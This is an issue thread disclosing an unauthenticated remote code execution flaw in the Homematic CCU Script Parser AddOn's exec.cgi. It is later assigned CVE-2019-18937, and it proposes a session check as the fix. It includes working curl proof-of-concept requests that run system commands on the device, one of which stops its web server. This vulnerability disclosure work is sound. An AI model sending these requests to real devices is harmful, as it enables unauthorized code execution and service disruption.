Adding user session check to exec.cgi

[psytester]

Just in case the Script Parser AddOn is a popular installed software, it can be used by an unauthenticated attacker with access to the web interface for any Remote Code Execution on Homematic CCU.

You may add a login session validation to exec.cgi as shown in PR homematic-community/XML-API#31 for XML-API
Otherwise such calls are possible:

curl -X POST -i 'http://1.2.3.4/addons/script/exec.cgi' --data 'var x=system.Exec("sleep 4;");'
curl -X POST -i 'http://1.2.3.4/addons/script/exec.cgi' --data 'var x=system.Exec("/bin/touch /tmp/testfile;");'
curl -X POST -i 'http://1.2.3.4/addons/script/exec.cgi' --data 'var x=system.Exec("/etc/init.d/S50lighttpd stop;");'
curl -X POST -i 'http://1.2.3.4/addons/script/exec.cgi' --data 'var x=dom.GetObject("CUxD.CUX2801001:1.CMD_EXEC").State("/bin/touch /tmp/testfile");'
curl -X POST -i 'http://1.2.3.4/addons/script/exec.cgi' --data 'var x=dom.GetObject("CUxD.CUX2801001:1.CMD_EXEC").State("/etc/init.d/S50lighttpd stop");'

[psytester]

This security issue was assigned and wil be published the next days as CVE-2019-18937.

[psytester]

👍 🥇